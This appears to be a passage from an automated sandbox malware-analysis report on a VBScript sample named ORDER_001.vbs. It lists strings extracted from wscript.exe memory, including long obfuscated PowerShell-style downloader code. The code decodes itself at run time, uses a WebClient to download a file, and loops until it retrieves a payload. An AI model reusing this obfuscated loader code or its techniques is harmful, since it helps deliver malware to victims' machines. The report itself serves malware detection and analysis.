Click to jump to signature section
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme |
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5b77d2ef9b |
Source: ORDER_001.vbs | Initial sample: Strings found which are bigger than 50 |
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F66000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n.aeCo.HusBapTol.aiUnwordE (Tr$SaVSyaUdlExiL dUdaS wordAdaCebU l AeM ).r ');Rewordfrdighedsflelsens (Mewordropolens 'Tr[SvNSyeDaword,e.TuSTee urwordxword . covSwordi rcNeeB PC oNoiNonA wordGuMGra wordnwordxword . c,aThgude .rAi]Sn:Ac:ArSsaeeycwordxword . couTarwordxword . cuiMawordWiyKaP,ar no Sword,ro cIno OlB. Du= o Se[NoNSveAfwordT..wordrSVeeS c ruQur BiBywordDiyLePO r eoSkword xoPrcdeo flBjT y,opM e ]Di:R : TU l.ys o1.g2 H ');$Evaporeringerne=$shearer[0];$Syresalwords=(Mewordropolens 'Un$Big ULsao,pbB.A Elgo: nHIny ,g rSwo pUnhBaYLswordkoeIn=TiNR ESwordwwordxword . ci- eO MBDojW,e LC iwordSh a sTiy ,sDiwordMueNoMSo.SlnBje TSh.PhW BeUnb,acAnL ,I .EUbNPeTCy ');Rewordfrdighedsflelsens ($Syresalwords);Rewordfrdighedsflelsens (Mewordropolens ' G$ H UyCogNorGroUdp hwordxword . c ySdwordIneRe.ceHM eMia SdA,eInrBes.i[S.$ lSHeaBhmkrm Te in Ls HwordBiy kDenMui nJegIneD,niwordsQu] a=S $ DApians mpByo osS.i Rwordwordxword . c,i aob,n sP.nU,uS mnam SeO r ,ewordxword . cor iwordxword . conN gSysre ');$Nonconfirmawordion118=Mewordropolens 'S,$.lHKoyGugM r aoB p vh Cy ,word reHe. eDAfoA wTinRel o Za Pd pwordxword . c ai,elCre n(La$ nERev eaP,p oSvr ce Trdui On Mg ,ePorB nCeeU , a$MaA,rlSusI iMadJeiL.gUfh,eeS dals akPirReamivSee anineA ) D ';$Alsidighedskravene=$Plisshrerne;Rewordfrdighedsflelsens (Mewordropolens 'Re$DeG rLB,oDobTha .LQu: IPUneTeaS,RUnL SiUdkUnEd =sp(CeTudEchsUnwordUn-KoPSwordaDkwordReHCr wordxword . c$ iaRel aS.qI D eI mGLihBeeGrd DSChKP,r BAi v rESpnSwordEBe)Op ');while (!$Pearlike) {Rewordfrdighedsflelsens (Mewordropolens 'de$HogUrlHuoTab,ya Tl s:BaO uwordxword . ciwordArcS.h eaSkr CmGae fd a=A $BrwordSmr HuEpeM, ') ;Rewordfrdighedsflelsens $Nonconfirmawordion118;Rewordfrdighedsflelsens (Mewordropolens 'O S ,word saD r .wordmi-V SU.l ,eAdeDipw S4 ');Rewordfrdighedsflelsens (MewordroporB nCe |
Source: wscript.exe, 00000000.00000003.2143121862.000001706B056000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129902609.0000017068F23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2145657324.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130162482.000001706ADEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617443544.000001706AEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2146391333.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2145248851.000001706B05C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129723315.000001706ADC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617568963.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2143761707.000001706B05B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129864207.000001706ADC1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Arbejdsvgring = Arbejdsvgring & ".Sln" |
Source: wscript.exe, 00000000.00000003.2143247519.000001706B037000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .Sln@ |
Source: wscript.exe, 00000000.00000002.4617443544.000001706AF87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdropolens ' y$seg kl ,oHyb aaS lIn:Tas ShBreGaa rrU,eUnrSk= .$DaEBhvcoaB,pS.oSnr oeCorSpiHjnUng ,eArr en.aeCo.HusBapTol.aiUnwordE (Tr$SaVSyaUdlExiL dUdaS wordAdaCebU l AeM ).r ');Rewordfrdighedsflelsens (Mewordropolens 'Tr[SvNSyeDaword,e.TuSTee urwordxword . covSwordi rcNeeB PC oNoiNonA wordGuMGra wordnwordxword . c,aThgude .rAi]Sn:Ac:ArSsaeeycwordxword . couTarwordxword . cuiMawordWiyKaP,ar no Sword,ro cIno OlB. Du= o Se[NoNSveAfwordT..wordrSVeeS c ruQur BiBywordDiyLePO r eoSkword xoPrcdeo flBjT y,opM e ]Di:R : TU l.ys o1.g2 H ');$Evaporeringerne=$shearer[0];$Syresalwords=(Mewordropolens 'Un$Big ULsao,pbB.A Elgo: nHIny ,g rSwo pUnhBaYLswordkoeIn=TiNR ESwordwwordxword . ci- eO MBDojW,e LC iwordSh a sTiy ,sDiwordMueNoMSo.SlnBje TSh.PhW BeUnb,acAnL ,I .EUbNPeTCy ');Rewordfrdighedsflelsens ($Syresalwords);Rewordfrdighedsflelsens (Mewordropolens ' G$ H UyCogNorGroUdp hwordxword . c ySdwordIneRe.ceHM eMia SdA,eInrBes.i[S.$ lSHeaBhmkrm Te in Ls HwordBiy kDenMui nJegIneD,niwordsQu] a=S $ DApians mpByo osS.i Rwordwordxword . c,i aob,n sP.nU,uS mnam SeO r ,ewordxword . cor iwordxword . conN gSysre ');$Nonconfirmawordion118=Mewordropolens 'S,$.lHKoyGugM r aoB p vh Cy ,word reHe. eDAfoA wTinRel o Za Pd pwordxword . c ai,elCre n(La$ nERev eaP,p oSvr ce Trdui On Mg ,ePorB nCeeU , a$MaA,rlSusI iMadJeiL.gUfh,eeS dals akPirReamivSee anineA ) D ';$Alsidighedskravene=$Plisshrerne;Rewordfrdighedsflelsens (Mewordropolens 'Re$DeG rLB,oDobTha .LQu: IPUneTeaS,RUnL SiUdkUnEd =sp(CeTudEchsUnwordUn-KoPSwordaDkwordReHCr wordxword . c$ iaRel aS.qI D eI mGLihBeeGrd DSChKP,r BAi v rESpnSwordEBe)Op ');while (!$Pearlike) {Rewordfrdighedsflelsens (Mewordropolens 'de$HogUrlHuoTab,ya Tl s:BaO uwordxword . ciwordArcS.h eaSkr CmGae fd a=A $BrwordSmr HuEpeM, ') ;Rewordfrdighedsflelsens $Nonconfirmawordion118;Rewordfrdighedsflelsens (Mewordropolens 'O S ,word saD r .wordmi-V SU.l ,eAdeDipw S4 ');Rewordfrdighedsflelsens (Mewordropolens 'Nu$ Kg nlBro ebBraUmlG :DeP geS awordxword . clrHalRei Sk .eB =wordxword . c.(BiTpoe IsS word e- UPPoa wordxword . cword Sh L $D AOvlNos iG dSpiS gS h wordegid.esBokPrrRea SvCrepanCheUn)To ') ;Rewordfrdighedsflelsens (Mewordropolens 'Te$Crg.vl voK.bwordxword . cia SlPr: SPoword,naChbDelLee aswordewordN oDelO eCun m=Ta$G gR,l eoSvbP,a GlKl:.owordxword . cBeiwordxword . c l,mnr,u kmSam Se,rrUneAywordwordes I+S +Tw%As$Mos phNeeBoaCorAme lrSk. cAnoLouPin Iwordwordxword . c ') ;$Evaporeringerne=$shearer[$Swor |